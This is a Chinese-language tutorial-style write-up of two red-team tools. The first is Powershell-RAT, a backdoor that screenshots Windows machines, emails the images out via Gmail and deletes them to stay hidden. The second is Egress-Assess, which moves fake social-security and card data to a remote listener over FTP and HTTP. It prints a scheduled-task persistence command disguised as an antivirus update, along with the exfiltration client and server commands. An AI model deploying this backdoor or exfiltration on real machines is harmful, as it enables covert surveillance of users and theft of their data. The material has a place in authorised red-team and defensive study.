Powershell-RAT
基于Python的后门程序,它使用Gmail将数据作为电子邮件附件进行泄露。
此RAT将帮助红队合作期间的任何人将任何Windows计算机后门。它使用屏幕捕获跟踪用户活动,并将信息作为电子邮件附件发送给攻击者。
1 | python3 PowershellRAT.py |
查看源码
点击数字键执行函数
1 | cmds = { |
- 按1:此选项将执行策略设置为不受限制使用
Set-ExecutionPolicy Unrestricted
。这在管理员计算机上很有用 - 按2:这将使用
Shoot.ps1
Powershell脚本获取用户计算机上当前屏幕的屏幕截图 - 按3:此选项使用户机器后门
schtasks
并将任务名称设置为MicrosoftAntiVirusCriticalUpdatesCore
- 按4:此选项使用用户计算机发送电子邮件
Powershell
。这些使用Mail.ps1
文件将截屏作为附件发送到exfiltrate数据 - 按5:此选项使用户机器后门
schtasks
,并将任务名称设置为MicrosoftAntiVirusCriticalUpdatesUA
- 按6:此选项从用户计算机中删除屏幕截图以保持隐身
- 按7:此选项使用户机器后门
schtasks
并将任务名称设置为MicrosoftAntiVirusCriticalUpdatesDF
- 按8:此选项
press 8
通过键盘上的单个按钮执行上述所有操作。攻击者将收到一封电子邮件,每封电子邮件都5 minutes
附有屏幕截图。屏幕截图将在删除后删除12 minutes
- 按9:从程序中正常退出或按
Control+C
README中的cmd_HailMary
查看执行的命令
1 | powershell schtasks /create /sc minute /mo 1 /tn MicrosoftAntiVirusCriticalUpdatesCore /tr C:\Python36\Shoot.vbs |
第一条命令内容:创建一个名为MicrosoftAntiVirusCriticalUpdatesCore
的计划任务,然后执行shoot.vbs
文件的内容。
管理计划任务
SCHTASKS /parameter [arguments]/Create 创建新计划任务。
/Delete 删除计划任务。
/Query 显示所有计划任务。
/Change 更改计划任务属性。
/Run 按需运行计划任务。
/End 中止当前正在运行的计划任务。
/ShowSid 显示与计划的任务名称相应的安全标识符。
f/? 显示帮助消息。
/SC schedule 指定计划频率
/MO modifier 改进计划类型以允许更好地控制计划重复
shoot.vbs
1 | Set WinScriptHost = CreateObject("WScript.Shell") |
shoot.bat
1 | @echo off |
shoot.ps1
1 | ############################################################################ |
powershell文件的意思就是通过$Screen = [System.Windows.Forms.SystemInformation]::VirtualScreen
设置图像参数,再通过$bitmap = New-Object System.Drawing.Bitmap $Width, $Height
获得图像参数,$graphic.CopyFromScreen($Left, $Top, 0, 0, $bitmap.Size)
获取图像。
然后再通过Mail.vbs
执行类似操作
填入发送人gmail信息和收件人gmail地址即可。
最后delScreenShot.vbs
进行删除操作。
Egress-Assess
安装模块
1 | dnslib |
选择STMP
,ICMP
,ftp
,SFTP
,SMB
,DNS_TXT
,DNS_Reslove
服务测试出口数据检测功能,助横向移动。
针对FTP
服务端执行
1 | python Egress-Assess.py --server ftp --username testuser --password pass123 |
客户端(也就是要横向移动的目标)
1 | ./Egress-Assess.py --client ftp --username test --password pass --datatype ssn --ip 192.168.63.149 |
在与Egress-Assess相同的目录中,将创建“数据”目录。在其中将存储所有传输的文件。此时,通过FTP完成传输.
针对HTTP
默认情况下,Egress-Assess将生成大约1兆字节的数据(社会安全号码或信用卡号码)
服务端执行
1 | ./Egress-Assess.py --server http |
客户端执行
1 | python Egress-Assess.py --client http --data-size 15 --ip 10.0.85.55 --datatype cc |